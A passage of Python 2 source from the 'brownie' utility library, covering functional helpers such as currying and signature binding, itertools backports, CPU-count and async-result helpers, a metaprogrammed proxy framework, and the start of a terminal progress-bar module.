Returns a function which behaves like `function` but gets the given
positional arguments reversed; keyword arguments are passed through.
>>> from brownie.functional import flip
>>> def f(a, b): return a
>>> f(1, 2)
1
>>> flip(f)(1, 2)
2
"""
@wraps(function)
def wrap(*args, **kwargs):
return function(*reversed(args), **kwargs)
return wrap
class Signature(namedtuple('SignatureBase', [
'positionals', 'kwparams', 'varargs', 'varkwargs'
])):
"""
A named tuple representing a function signature.
:param positionals:
A list of required positional parameters.
:param kwparams:
A list containing the keyword arguments, each as a tuple containing the
name and default value, in order of their appearance in the function
definition.
:param varargs:
The name used for arbitrary positional arguments or `None`.
:param varkwargs:
The name used for arbitary keyword arguments or `None`.
.. warning::
The size of :class:`Signature` tuples may change in the future to
accommodate additional information like annotations. Therefore you
should not rely on it.
.. versionadded:: 0.5
"""
@classmethod
def from_function(cls, func):
"""
Constructs a :class:`Signature` from the given function or method.
"""
func = getattr(func, 'im_func', func)
params, varargs, varkwargs, defaults = getargspec(func)
defaults = [] if defaults is None else defaults
return cls(
params[
:0 if len(defaults) == len(params)
else -len(defaults) or len(params)
],
zip(params[-len(defaults):], defaults),
varargs,
varkwargs
)
def bind_arguments(self, args=(), kwargs=None):
"""
Returns a dictionary with the names of the parameters as keys with
their arguments as values.
Raises a :exc:`ValueError` if there are too many `args` and/or `kwargs`
that are missing or repeated.
"""
kwargs = {} if kwargs is None else kwargs
required = set(self.positionals)
overwritable = set(name for name, default in self.kwparams)
settable = required | overwritable
positional_count = len(self.positionals)
kwparam_count = len(self.kwparams)
result = dict(self.kwparams, **dict(zip(self.positionals, args)))
remaining = args[positional_count:]
for (param, _), arg in zip(self.kwparams, remaining):
result[param] = arg
overwritable.discard(param)
if len(remaining) > kwparam_count:
if self.varargs is None:
raise ValueError(
'expected at most %d positional arguments, got %d' % (
positional_count + kwparam_count,
len(args)
)
)
else:
result[self.varargs] = tuple(remaining[kwparam_count:])
remaining = {}
unexpected = []
for key, value in kwargs.iteritems():
if key in result and key not in overwritable:
raise ValueError("got multiple values for '%s'" % key)
elif key in settable:
result[key] = value
elif self.varkwargs:
result_kwargs = result.setdefault(self.varkwargs, {})
result_kwargs[key] = value
else:
unexpected.append(key)
if len(unexpected) == 1:
raise ValueError(
"got unexpected keyword argument '%s'" % unexpected[0]
)
elif len(unexpected) == 2:
raise ValueError(
"got unexpected keyword arguments '%s' and '%s'" % tuple(unexpected)
)
elif unexpected:
raise ValueError("got unexpected keyword arguments %s and '%s'" % (
', '.join("'%s'" % arg for arg in unexpected[:-1]), unexpected[-1]
))
if set(result) < set(self.positionals):
missing = set(result) ^ set(self.positionals)
if len(missing) == 1:
raise ValueError("'%s' is missing" % missing.pop())
elif len(missing) == 2:
raise ValueError("'%s' and '%s' are missing" % tuple(missing))
else:
missing = tuple(missing)
raise ValueError("%s and '%s' are missing" % (
', '.join("'%s'" % name for name in missing[:-1]), missing[-1]
))
if self.varargs:
result.setdefault(self.varargs, ())
if self.varkwargs:
result.setdefault(self.varkwargs, {})
return result
class curried(object):
"""
:class:`curried` is a decorator providing currying for callable objects.
Each call to the curried callable returns a new curried object unless it
is called with every argument required for a 'successful' call to the
function::
>>> foo = curried(lambda a, b, c: a + b * c)
>>> foo(1, 2, 3)
6
>>> bar = foo(c=2)
>>> bar(2, 3)
8
>>> baz = bar(3)
>>> baz(3)
9
By the way if the function takes arbitrary positional and/or keyword
arguments this will work as expected.
.. versionadded:: 0.5
"""
def __init__(self, function):
self.function = function
self.signature = Signature.from_function(function)
self.params = self.signature.positionals + [
name for name, default in self.signature.kwparams
]
self.args = {}
self.changeable_args = set(
name for name, default in self.signature.kwparams
)
@property
def remaining_params(self):
return unique(self.params, set(self.args) - self.changeable_args)
def _updated(self, args):
result = object.__new__(self.__class__)
result.__dict__.update(self.__dict__)
result.args = args
return result
def __call__(self, *args, **kwargs):
collected_args = self.args.copy()
for remaining, arg in izip_longest(self.remaining_params, args):
if remaining is None:
if self.signature.varargs is None:
raise TypeError('unexpected positional argument: %r' % arg)
collected_args.setdefault(self.signature.varargs, []).append(arg)
elif arg is None:
break
else:
collected_args[remaining] = arg
self.changeable_args.discard(remaining)
for key, value in kwargs.iteritems():
if key in self.params:
if key in collected_args:
raise TypeError("'%s' has been repeated: %r" % (key, value))
self.changeable_args.discard(key)
collected_args[key] = value
else:
if self.signature.varkwargs is None:
raise TypeError(
'%s is an unexpected keyword argument: %r' % (
key, value
)
)
else:
collected_args.setdefault(
self.signature.varkwargs,
FixedDict()
)[key] = value
if set(self.signature.positionals) <= set(collected_args):
func_kwargs = dict(self.signature.kwparams)
func_kwargs = FixedDict(self.signature.kwparams, **collected_args)
func_kwargs.update(func_kwargs.pop(self.signature.varkwargs, {}))
args = map(func_kwargs.pop, self.params)
args += func_kwargs.pop(self.signature.varargs, [])
return self.function(*args, **func_kwargs)
return self._updated(collected_args)
def fmap(obj, functions):
"""
Returns a generator yielding `function(obj)` for each function in
`functions`.
`functions` may contain iterables of functions instead of functions which
will be composed and called with `obj`.
.. versionadded:: 0.6
"""
for function in functions:
try:
iter(function)
except TypeError:
yield function(obj)
else:
yield compose(*function)(obj)
__all__ = ['compose', 'flip', 'Signature', 'curried', 'fmap']
########NEW FILE########
__FILENAME__ = importing
# coding: utf-8
"""
brownie.importing
~~~~~~~~~~~~~~~~~
.. versionadded:: 0.2
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
import re
_identifier_re = re.compile(r'^[a-zA-Z_][a-zA-Z0-9_]*$')
def _raise_identifier(identifier):
if _identifier_re.match(identifier) is None:
raise ValueError('invalid identifier: %s' % identifier)
def import_string(name):
"""
Imports and returns an object given its `name` as a string.
As an addition to the normal way import paths are specified you can use
a colon to delimit the object you want to import.
If the given name is invalid a :exc:`ValueError` is raised, if the module
cannot be imported an :exc:`ImportError`.
Beware of the fact that in order to import a module it is executed and
therefore any exception could be raised, especially when dealing with
third party code e.g. if you implement a plugin system.
"""
if ':' in name:
module, obj = name.split(':', 1)
elif '.' in name:
module, obj = name.rsplit('.', 1)
else:
_raise_identifier(name)
return __import__(name)
for identifier in module.split('.') + [obj]:
_raise_identifier(identifier)
return getattr(
__import__(module, globals=None, locals=None, fromlist=[obj]),
obj
)
__all__ = ['import_string']
########NEW FILE########
__FILENAME__ = itools
# coding: utf-8
"""
brownie.itools
~~~~~~~~~~~~~~
Implements :mod:`itertools` functions for earlier version of Python.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, PSF see LICENSE.rst for details
"""
from itertools import repeat, izip
class chain(object):
"""
An iterator which yields elements from the given `iterables` until each
iterable is exhausted.
.. versionadded:: 0.2
"""
@classmethod
def from_iterable(cls, iterable):
"""
Alternative constructor which takes an `iterable` yielding iterators,
this can be used to chain an infinite number of iterators.
"""
rv = object.__new__(cls)
rv._init(iterable)
return rv
def __init__(self, *iterables):
self._init(iterables)
def _init(self, iterables):
self.iterables = iter(iterables)
self.current_iterable = iter([])
def __iter__(self):
return self
def next(self):
try:
return self.current_iterable.next()
except StopIteration:
self.current_iterable = iter(self.iterables.next())
return self.current_iterable.next()
def izip_longest(*iterables, **kwargs):
"""
Make an iterator that aggregates elements from each of the iterables. If
the iterables are of uneven length, missing values are filled-in with
`fillvalue`. Iteration continues until the longest iterable is exhausted.
If one of the iterables is potentially infinite, then the
:func:`izip_longest` function should be wrapped with something that limits
the number of calls (for example :func:`itertools.islice` or
:func:`itertools.takewhile`.) If not specified, `fillvalue` defaults to
``None``.
.. note:: Software and documentation for this function are taken from
CPython, :ref:`license details <psf-license>`.
"""
fillvalue = kwargs.get('fillvalue')
def sentinel(counter=([fillvalue] * (len(iterables) - 1)).pop):
yield counter()
fillers = repeat(fillvalue)
iters = [chain(it, sentinel(), fillers) for it in iterables]
try:
for tup in izip(*iters):
yield tup
except IndexError:
pass
def permutations(iterable, r=None):
"""
Return successive `r` length permutations of elements in the `iterable`.
If `r` is not specified or is ``None``, then `r` defaults to the length of
the `iterable` and all possible full-length permutations are generated.
Permutations are emitted in lexicographic sort order. So, if the input
`iterable` is sorted, the permutation tuples will be produced in sorted
order.
Elements are treated as unique based on their position, not on their
value. So if the input elements are unique, there will be no repeating
value in each permutation.
The number of items returned is ``n! / (n - r)!`` when ``0 <= r <= n`` or
zero when `r > n`.
.. note:: Software and documentation for this function are taken from
CPython, :ref:`license details <psf-license>`.
"""
pool = tuple(iterable)
n = len(pool)
r = n if r is None else r
for indices in product(range(n), repeat=r):
if len(set(indices)) == r:
yield tuple(pool[i] for i in indices)
def product(*iterables, **kwargs):
"""
Cartesian product of input iterables.
Equivalent to nested for-loops in a generator expression. For example,
``product(A, B)`` returns the same as ``((x, y) for x in A for y in B)``.
The nested loops cycle like an odometer with the rightmost element
advancing on every iteration. The pattern creates a lexicographic ordering
so that if the input's iterables are sorted, the product tuples are emitted
in sorted order.
To compute the product of an iterable with itself, specify the number of
repetitions with the optional `repeat` keyword argument. For example,
``product(A, repeat=4)`` means the same as ``product(A, A, A, A)``.
.. note:: Software and documentation for this function are taken from
CPython, :ref:`license details <psf-license>`.
"""
pools = map(tuple, iterables) * kwargs.get('repeat', 1)
result = [[]]
for pool in pools:
result = [x + [y] for x in result for y in pool]
for prod in result:
yield tuple(prod)
def starmap(function, iterable):
"""
Make an iterator that computes the function using arguments obtained from
the iterable. Used instead of :func:`itertools.imap` when an argument
parameters are already grouped in tuples from a single iterable (the data
has been "pre-zipped"). The difference between :func:`itertools.imap` and
:func:`starmap` parallels the distinction between ``function(a, b)`` and
``function(*c)``.
.. note:: Software and documentation for this function are taken from
CPython, :ref:`license details <psf-license>`.
"""
for args in iterable:
yield function(*args)
def combinations_with_replacement(iterable, r):
"""
Return `r` length sub-sequences of elements from the `iterable` allowing
individual elements to be replaced more than once.
Combinations are emitted in lexicographic sort order. So, if the input
`iterable` is sorted, the combinations tuples will be produced in sorted
order.
Elements are treated as unique based on their position, not on their value.
So if the input elements are unique, the generated combinations will also
be unique.
The number of items returned is ``(n + r - 1)! / r! / (n - 1)!`` when
``n > 0``.
.. note:: Software and documentation for this function are taken from
CPython, :ref:`license details <psf-license>`.
"""
pool = tuple(iterable)
n = len(pool)
for indices in product(xrange(n), repeat=r):
if sorted(indices) == list(indices):
yield tuple(pool[i] for i in indices)
def compress(data, selectors):
"""
Make an iterator that filters elements from the `data` returning only
those that have a corresponding element in `selectors` that evaluates to
``True``. Stops when either the `data` or `selectors` iterables have been
exhausted.
.. note:: Software and documentation for this function are taken from
CPython, :ref:`license details <psf-license>`.
"""
return (d for d, s in izip(data, selectors) if s)
def count(start=0, step=1):
"""
Make an iterator that returns evenly spaced values starting with `start`.
Often used as an argument to :func:`imap` to generate consecutive data
points. Also, used with :func:`izip` to add sequence numbers.
When counting with floating point numbers, better accuracy can sometimes
be achieved by substituting multiplicative code such as:
``(start + step * i for i in count())``.
.. note:: Software and documentation for this function are taken from
CPython, :ref:`license details <psf-license>`.
"""
n = start
while True:
yield n
n += step
def grouped(n, iterable, fillvalue=None):
"""
Groups the items in the given `iterable` to tuples of size `n`. In order
for groups to always be of the size `n` the `fillvalue` is used for
padding.
"""
return izip_longest(fillvalue=fillvalue, *([iter(iterable)] * n))
def unique(iterable, seen=None):
"""
Yields items from the given `iterable` of (hashable) items, once seen an
item is not yielded again.
:param seen:
An iterable specifying already 'seen' items which will be excluded
from the result.
.. versionadded:: 0.5
.. versionchanged:: 0.5
Items don't have to be hashable any more.
"""
seen = set() if seen is None else set(seen)
seen_unhashable = []
for item in iterable:
try:
if item not in seen:
seen.add(item)
yield item
except TypeError:
if item not in seen_unhashable:
seen_unhashable.append(item)
yield item
def flatten(iterable, ignore=(basestring, )):
"""
Flattens a nested `iterable`.
:param ignore:
Types of iterable objects which should be yielded as-is.
.. versionadded:: 0.5
"""
stack = [iter(iterable)]
while stack:
try:
item = stack[-1].next()
if isinstance(item, ignore):
yield item
elif isinstance(item, basestring) and len(item) == 1:
yield item
else:
try:
stack.append(iter(item))
except TypeError:
yield item
except StopIteration:
stack.pop()
__all__ = [
'chain', 'izip_longest', 'permutations', 'product', 'starmap',
'combinations_with_replacement', 'compress', 'count', 'grouped', 'unique',
'flatten'
]
########NEW FILE########
__FILENAME__ = parallel
# coding: utf-8
"""
brownie.parallel
~~~~~~~~~~~~~~~~
Implements useful parallelization stuff.
:copyright: 2010-2011 by Daniel Neuhaeuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
import os
import sys
from threading import Condition, Lock
try:
from multiprocessing import _get_cpu_count
def get_cpu_count(default=None):
try:
return _get_cpu_count()
except NotImplementedError:
if default is None:
raise
return default
except ImportError:
def get_cpu_count(default=None):
if sys.platform == 'win32':
try:
return int(os.environ['NUMBER_OF_PROCESSORS'])
except (ValueError, KeyError):
# value could be anything or not existing
pass
if sys.platform in ('bsd', 'darwin'):
try:
return int(os.popen('sysctl -n hw.ncpu').read())
except ValueError:
# don't trust the outside world
pass
try:
cpu_count = os.sysconf('SC_NPROCESSORS_ONLN')
if cpu_count >= 1:
return cpu_count
except (AttributeError, ValueError):
# availability is restricted to unix
pass
if default is not None:
return default
raise NotImplementedError()
get_cpu_count.__doc__ = """
Returns the number of available processors on this machine.
If default is ``None`` and the number cannot be determined a
:exc:`NotImplementedError` is raised.
"""
class TimeoutError(Exception):
"""Exception raised in case of timeouts."""
class AsyncResult(object):
"""
Helper object for providing asynchronous results.
:param callback:
Callback which is called if the result is a success.
:param errback:
Errback which is called if the result is an exception.
"""
def __init__(self, callback=None, errback=None):
self.callback = callback
self.errback = errback
self.condition = Condition(Lock())
#: ``True`` if a result is available.
self.ready = False
def wait(self, timeout=None):
"""
Blocks until the result is available or the given `timeout` has been
reached.
"""
with self.condition:
if not self.ready:
self.condition.wait(timeout)
def get(self, timeout=None):
"""
Returns the result or raises the exception which has been set, if
the result is not available this method is blocking.
If `timeout` is given this method raises a :exc:`TimeoutError`
if the result is not available soon enough.
"""
self.wait(timeout)
if not self.ready:
raise TimeoutError(timeout)
if self.success:
return self.value
else:
raise self.value
def set(self, obj, success=True):
"""
Sets the given `obj` as result, set `success` to ``False`` if `obj`
is an exception.
"""
self.value = obj
self.success = success
if self.callback and success:
self.callback(obj)
if self.errback and not success:
self.errback(obj)
with self.condition:
self.ready = True
self.condition.notify()
def __repr__(self):
parts = []
if self.callback is not None:
parts.append(('callback', self.callback))
if self.errback is not None:
parts.append(('errback', self.errback))
return '%s(%s)' % (
self.__class__.__name__,
', '.join('%s=%r' % part for part in parts)
)
__all__ = ['get_cpu_count', 'TimeoutError', 'AsyncResult']
########NEW FILE########
__FILENAME__ = proxies
# coding: utf-8
"""
brownie.proxies
~~~~~~~~~~~~~~~
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE for details
"""
import textwrap
from brownie.datastructures import missing
SIMPLE_CONVERSION_METHODS = {
'__str__': str,
'__unicode__': unicode,
'__complex__': complex,
'__int__': int,
'__long__': long,
'__float__': float,
'__oct__': oct,
'__hex__': hex,
'__nonzero__': bool
}
CONVERSION_METHODS = set(SIMPLE_CONVERSION_METHODS) | frozenset([
'__index__', # slicing, operator.index()
'__coerce__', # mixed-mode numeric arithmetic
])
COMPARISON_METHODS = {
'__lt__': '<',
'__le__': '<=',
'__eq__': '==',
'__ne__': '!=',
'__gt__': '>',
'__ge__': '>='
}
DESCRIPTOR_METHODS = frozenset([
'__get__',
'__set__',
'__delete__',
])
REGULAR_BINARY_ARITHMETIC_METHODS = frozenset([
'__add__',
'__sub__',
'__mul__',
'__div__',
'__truediv__',
'__floordiv__',
'__mod__',
'__divmod__',
'__pow__',
'__lshift__',
'__rshift__',
'__and__',
'__xor__',
'__or__',
])
REVERSED_ARITHMETIC_METHODS = frozenset([
'__radd__',
'__rsub__',
'__rmul__',
'__rdiv__',
'__rtruediv__',
'__rfloordiv__',
'__rmod__',
'__rdivmod__',
'__rpow__',
'__rlshift__',
'__rrshift__',
'__rand__',
'__rxor__',
'__ror__',
])
AUGMENTED_ASSIGNMENT_METHODS = frozenset([
'__iadd__',
'__isub__',
'__imul__',
'__idiv__',
'__itruediv__'
'__ifloordiv__',
'__imod__',
'__ipow__',
'__ipow__',
'__ilshift__',
'__rlshift__',
'__iand__',
'__ixor__',
'__ior__',
])
BINARY_ARITHMETHIC_METHODS = (
REGULAR_BINARY_ARITHMETIC_METHODS |
REVERSED_ARITHMETIC_METHODS |
AUGMENTED_ASSIGNMENT_METHODS
)
UNARY_ARITHMETHIC_METHODS = frozenset([
'__neg__', # -
'__pos__', # +
'__abs__', # abs()
'__invert__' # ~
])
SIMPLE_CONTAINER_METHODS = {
'__len__': len,
'__iter__': iter,
'__reversed__': reversed
}
CONTAINER_METHODS = frozenset(SIMPLE_CONTAINER_METHODS) | frozenset([
'__getitem__', # ...[]
'__setitem__', # ...[] = ...
'__delitem__', # del ...[]
'__contains__' # ... in ...
])
SLICING_METHODS = frozenset([
'__getslice__',
'__setslice__',
'__delslice__',
])
TYPECHECK_METHODS = frozenset([
'__instancecheck__', # isinstance()
'__issubclass__', # issubclass()
])
CONTEXT_MANAGER_METHODS = frozenset([
'__enter__',
'__exit__'
])
UNGROUPABLE_METHODS = frozenset([
# special comparison
'__cmp__', # cmp()
# hashability, required if ==/!= are implemented
'__hash__', # hash()
'__call__', # ...()
])
#: All special methods with exception of :meth:`__new__` and :meth:`__init__`.
SPECIAL_METHODS = (
CONVERSION_METHODS |
set(COMPARISON_METHODS) |
DESCRIPTOR_METHODS |
BINARY_ARITHMETHIC_METHODS |
UNARY_ARITHMETHIC_METHODS |
CONTAINER_METHODS |
SLICING_METHODS |
TYPECHECK_METHODS |
CONTEXT_MANAGER_METHODS |
UNGROUPABLE_METHODS
)
SIMPLE_METHODS = {}
SIMPLE_METHODS.update(SIMPLE_CONVERSION_METHODS)
SIMPLE_METHODS.update(SIMPLE_CONTAINER_METHODS)
class ProxyMeta(type):
def _set_private(self, name, obj):
setattr(self, '_ProxyBase__' + name, obj)
def method(self, handler):
self._set_private('method_handler', handler)
def getattr(self, handler):
self._set_private('getattr_handler', handler)
def setattr(self, handler):
self._set_private('setattr_handler', handler)
def repr(self, repr_handler):
self._set_private('repr_handler', repr_handler)
class ProxyBase(object):
def __init__(self, proxied):
self.__proxied = proxied
def __force(self, proxied):
return self.__proxied
def __method_handler(self, proxied, name, get_result, *args, **kwargs):
return missing
def __getattr_handler(self, proxied, name):
return getattr(proxied, name)
def __setattr_handler(self, proxied, name, obj):
return setattr(proxied, name, obj)
def __repr_handler(self, proxied):
return repr(proxied)
def __dir__(self):
return dir(self.__proxied)
def __getattribute__(self, name):
if name.startswith('_ProxyBase__'):
return object.__getattribute__(self, name)
return self.__getattr_handler(self.__proxied, name)
def __setattr__(self, name, obj):
if name.startswith('_ProxyBase__'):
return object.__setattr__(self, name, obj)
return self.__setattr_handler(self.__proxied, name, obj)
def __repr__(self):
return self.__repr_handler(self.__proxied)
# the special methods we implemented so far (for special cases)
implemented = set()
def __contains__(self, other):
def get_result(proxied, other):
return other in proxied
result = self.__method_handler(self.__proxied, '__contains__',
get_result, other)
if result is missing:
return get_result(self.__proxied, other)
return result
implemented.add('__contains__')
def __getslice__(self, i, j):
def get_result(proxied, i, j):
return proxied[i:j]
result = self.__method_handler(self.__proxied, '__getslice__',
get_result, i, j)
if result is missing:
return get_result(self.__proxied, i, j)
return result
implemented.add('__getslice__')
def __setslice__(self, i, j, value):
def get_result(proxied, i, j, value):
proxied[i:j] = value
result = self.__method_handler(
self.__proxied, '__setslice__', get_result, i, j, value
)
if result is missing:
return get_result(self.__proxied, i, j, value)
return result
implemented.add('__setslice__')
def __delslice__(self, i, j):
def get_result(proxied, i, j):
del proxied[i:j]
result = self.__method_handler(
self.__proxied, '__delslice__', get_result, i, j
)
if result is missing:
return get_result(self.__proxied, i, j)
return result
implemented.add('__delslice__')
# simple methods such as __complex__ are not necessarily defined like
# other special methods, especially for built-in types by using the
# built-in functions we achieve the desired behaviour.
method_template = textwrap.dedent("""
def %(name)s(self):
def get_result(proxied):
return %(func)s(proxied)
result = self._ProxyBase__method_handler(
self._ProxyBase__proxied, '%(name)s', get_result
)
if result is missing:
return get_result(self._ProxyBase__proxied)
return result
""")
for method, function in SIMPLE_METHODS.items():
exec(method_template % dict(name=method, func=function.__name__))
implemented.update(SIMPLE_METHODS)
del function
# we need to special case comparison methods due to the fact that
# if we implement __lt__ and call it on the proxied object it might fail
# because the proxied object implements __cmp__ instead.
method_template = textwrap.dedent("""
def %(name)s(self, other):
def get_result(proxied, other):
return proxied %(operator)s other
result = self._ProxyBase__method_handler(
self._ProxyBase__proxied, '%(name)s', get_result, other
)
if result is missing:
return get_result(self._ProxyBase__proxied, other)
return result
""")
for method, operator in COMPARISON_METHODS.items():
exec(method_template % dict(name=method, operator=operator))
implemented.update(COMPARISON_METHODS)
del operator
method_template = textwrap.dedent("""
def %(name)s(self, *args, **kwargs):
def get_result(proxied, *args, **kwargs):
other = args[0]
if type(self) is type(other):
other = other._ProxyBase__force(other._ProxyBase__proxied)
return proxied.%(name)s(
*((other, ) + args[1:]), **kwargs
)
result = self._ProxyBase__method_handler(
self._ProxyBase__proxied,
'%(name)s',
get_result,
*args,
**kwargs
)
if result is missing:
return get_result(self._ProxyBase__proxied, *args, **kwargs)
return result
""")
for method in BINARY_ARITHMETHIC_METHODS:
exec(method_template % dict(name=method))
implemented.update(BINARY_ARITHMETHIC_METHODS)
method_template = textwrap.dedent("""
def %(name)s(self, *args, **kwargs):
def get_result(proxied, *args, **kwargs):
return proxied.%(name)s(*args, **kwargs)
result = self._ProxyBase__method_handler(
self._ProxyBase__proxied, '%(name)s', get_result, *args, **kwargs
)
if result is missing:
return get_result(self._ProxyBase__proxied, *args, **kwargs)
return result
""")
for method in SPECIAL_METHODS - implemented:
method = method_template % dict(name=method)
exec(method)
del method_template, method, implemented
def as_proxy(cls):
'''
Class decorator which returns a proxy based on the handlers defined in the
given class defined as methods::
@as_proxy
class MyProxy(object):
"""
This is an example proxy, every method defined is optional.
"""
def method(self, proxied, name, get_result, *args, **kwargs):
"""
Gets called when a special method is called on the proxy
:param proxied:
The object wrapped by the proxy.
:param name:
The name of the called method.
:param get_result:
A function which takes `proxied`, `*args` and `**kwargs`
as arguments and returns the appropriate result for the
called method.
:param \*args:
The positional arguments passed to the method.
:param \*\*kwargs:
The keyword arguments passed to the method.
"""
return missing
def getattr(self, proxied, name):
"""
Gets called when a 'regular' attribute is accessed.
:param name:
The name of the attribute.
"""
return getattr(proxied, name)
def setattr(self, proxied, name, obj):
"""
Gets called when a 'regular' attribute is set.
:param obj:
The object which is set as attribute.
"""
setattr(proxied, name, obj)
def force(self, proxied):
"""
Returns a 'real' version of `proxied`. This is required when
`proxied` is something abstract like a function which returns
an object like which the proxy is supposed to behave.
Internally this is used when a binary operator is used with the
proxy on the left side. Built-in types complain if we call the
special method with the proxy given on the right side of the
operator, therefore the proxy on the right side is 'forced'.
"""
return proxied
def repr(self, proxied):
"""
Gets called for the representation of the proxy.
"""
return repr(proxied)
foo = MyProxy(1)
'''
attributes = {
'__module__': cls.__module__,
'__doc__': cls.__doc__
}
handler_name_mapping = {
'method': '_ProxyBase__method_handler',
'getattr': '_ProxyBase__getattr_handler',
'setattr': '_ProxyBase__setattr_handler',
'force': '_ProxyBase__force',
'repr': '_ProxyBase__repr_handler'
}
for name, internal_name in handler_name_mapping.iteritems():
handler = getattr(cls, name, None)
if handler is not None:
attributes[internal_name] = handler.im_func
return ProxyMeta(cls.__name__, (ProxyBase, ), attributes)
def get_wrapped(proxy):
"""
Returns the item wrapped by a given `proxy` whereas `proxy` is an instance
of a class as returned by :func:`as_proxy`.
"""
return proxy._ProxyBase__proxied
class LazyProxy(object):
"""
Takes a callable and calls it every time this proxy is accessed to get an
object which is then wrapped by this proxy::
>>> from datetime import datetime
>>> now = LazyProxy(datetime.utcnow)
>>> now.second != now.second
True
"""
def method(self, proxied, name, get_result, *args, **kwargs):
return get_result(proxied(), *args, **kwargs)
def getattr(self, proxied, name):
return getattr(proxied(), name)
def setattr(self, proxied, name, attr):
setattr(proxied(), name, attr)
def force(self, proxied):
return proxied()
def repr(self, proxied):
return '%s(%r)' % (type(self).__name__, proxied)
LazyProxy = as_proxy(LazyProxy)
__all__ = ['as_proxy', 'get_wrapped', 'LazyProxy']
########NEW FILE########
__FILENAME__ = progress
# coding: utf-8
"""
brownie.terminal.progress
~~~~~~~~~~~~~~~~~~~~~~~~~
A widget-based progress bar implementation.
.. versionadded:: 0.6
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import division
import re
import math
from functools import wraps
from datetime import datetime
from brownie.caching import LFUCache
from brownie.datastructures import ImmutableDict
#: Binary prefixes, largest first.
BINARY_PREFIXES = [
(u'Yi', 2 ** 80), # yobi
(u'Zi', 2 ** 70), # zebi
(u'Ei', 2 ** 60), # exbi
(u'Pi', 2 ** 50), # pebi
(u'Ti', 2 ** 40), # tebi
(u'Gi', 2 ** 30), # gibi
(u'Mi', 2 ** 20), # mebi
(u'Ki', 2 ** 10) # kibi
]
#: Positive SI prefixes, largest first.
SI_PREFIXES = [
(u'Y', 10 ** 24), # yotta
(u'Z', 10 ** 21), # zetta
(u'E', 10 ** 18), # exa
(u'P', 10 ** 15), # peta
(u'T', 10 ** 12), # tera
(u'G', 10 ** 9), # giga
(u'M', 10 ** 6), # mega
(u'k', 10 ** 3) # kilo
]
_progressbar_re = re.compile(ur"""
(?<!\$)\$([a-zA-Z]+) # identifier
(: # initial widget value
(?: # grouping to avoid : to be treated as part of
# the left or operand
"( # quoted string
(?:
[^"]| # any character except " or ...
(?<=\\)" # ... " preceded by a backslash
)*
)"|
([a-zA-Z]+) # identifiers can be used instead of strings
)
)?|
(\$\$) # escaped $
""", re.VERBOSE)
def count_digits(n):
if n == 0:
return 1
return int(math.log10(abs(n)) + (2 if n < 0 else 1))
def bytes_to_readable_format(bytes, binary=True):
prefixes = BINARY_PREFIXES if binary else SI_PREFIXES
for prefix, size in prefixes:
if bytes >= size:
result = bytes / size
return result, prefix + 'B'
return bytes, 'B'
def bytes_to_string(bytes, binary=True):
"""
Provides a nice readable string representation for `bytes`.
:param binary:
If ``True`` uses binary prefixes otherwise SI prefixes are used.
"""
result, prefix = bytes_to_readable_format(bytes, binary=binary)
if isinstance(result, int) or getattr(result, 'is_integer', lambda: False)():
return '%i%s' % (result, prefix)
return '%.02f%s' % (result, prefix)
@LFUCache.decorate(maxsize=64)
def parse_progressbar(string):
"""
Parses a string representing a progress bar.
"""
def add_text(text):
if not rv or rv[-1][0] != 'text':
rv.append(['text', text])
else:
rv[-1][1] += text
rv = []
remaining = string
while remaining:
match = _progressbar_re.match(remaining)
if match is None:
add_text(remaining[0])
remaining = remaining[1:]
elif match.group(5):
add_text(u'$')
remaining = remaining[match.end():]
else:
if match.group(3) is None:
value = match.group(4)
else:
value = match.group(3).decode('string-escape')
rv.append([match.group(1), value])
remaining = remaining[match.end():]
return rv
class Widget(object):
"""
Represents a part of a progress bar.
"""
#: The priority of the widget defines in which order they are updated. The
#: default priority is 0.
#:
#: This is important as the first widget being updated has the entire
#: line available.
priority = 0
#: Should be ``True`` if this widget depends on
#: :attr:`ProgressBar.maxsteps` being set to something other than ``None``.
requires_fixed_size = False
@property
def provides_size_hint(self):
return self.size_hint.im_func is not Widget.size_hint.im_func
def size_hint(self, progressbar):
"""
Should return the required size or ``None`` if it cannot be given.
"""
return None
def init(self, progressbar, remaining_width, **kwargs):
"""
Called when the progress bar is initialized.
Should return the output of the widget as string.
"""
raise NotImplementedError('%s.init' % self.__class__.__name__)
def update(self, progressbar, remaining_width, **kwargs):
"""
Called when the progress bar is updated, not necessarily with each
step.
Should return the output of the widget as string.
"""
raise NotImplementedError('%s.update' % self.__class__.__name__)
def finish(self, progressbar, remaining_width, **kwargs):
"""
Called when the progress bar is finished, not necessarily after
maxsteps has been reached, per default this calls :meth:`update`.
Should return the output of the widget as string.
"""
return self.update(progressbar, remaining_width, **kwargs)
def __repr__(self):
return '%s()' % self.__class__.__name__
class TextWidget(Widget):
"""
Represents static text in a progress bar.
"""
def __init__(self, text):
self.text = text
def size_hint(self, progressbar):
return len(self.text)
def update(self, progressbar, remaining_width, **kwargs):
return self.text
init = update
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self.text)
class HintWidget(Widget):
"""
Represents a 'hint', changing text passed with each update, in a progress
bar.
Requires that :meth:`ProgressBar.next` is called with a `hint` keyword
argument.
This widget has a priority of 1.
"""
priority = 1
def __init__(self, initial_hint=u''):
self.initial_hint = initial_hint
def init(self, progressbar, remaining_width, **kwargs):
return self.initial_hint
def update(self, progressbar, remaining_width, **kwargs):
try:
return kwargs.get('hint', u'')
except KeyError:
raise TypeError("expected 'hint' as a keyword argument")
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self.initial_hint)
class PercentageWidget(Widget):
"""
Represents a string showing the progress as percentage.
"""
requires_fixed_size = True
def calculate_percentage(self, progressbar):
return 100 / progressbar.maxsteps * progressbar.step
def size_hint(self, progressbar):
return count_digits(self.calculate_percentage(progressbar)) + 1
def init(self, progressbar, remaining_width, **kwargs):
return '0%'
def update(self, progressbar, remaining_width, **kwargs):
return '%i%%' % self.calculate_percentage(progressbar)
def finish(self, progressbar, remaining_width, **kwargs):
return '100%'
class BarWidget(Widget):
"""
A simple bar which moves with each update not corresponding with the
progress being made.
The bar is enclosed in brackets, progress is visualized by tree hashes
`###` moving forwards or backwards with each update; the rest of the bar is
filled with dots `.`.
"""
def __init__(self):
self.position = 0
self.going_forward = True
def make_bar(self, width):
parts = ['.'] * (width - 2)
parts[self.position:self.position+3] = '###'
return '[%s]' % ''.join(parts)
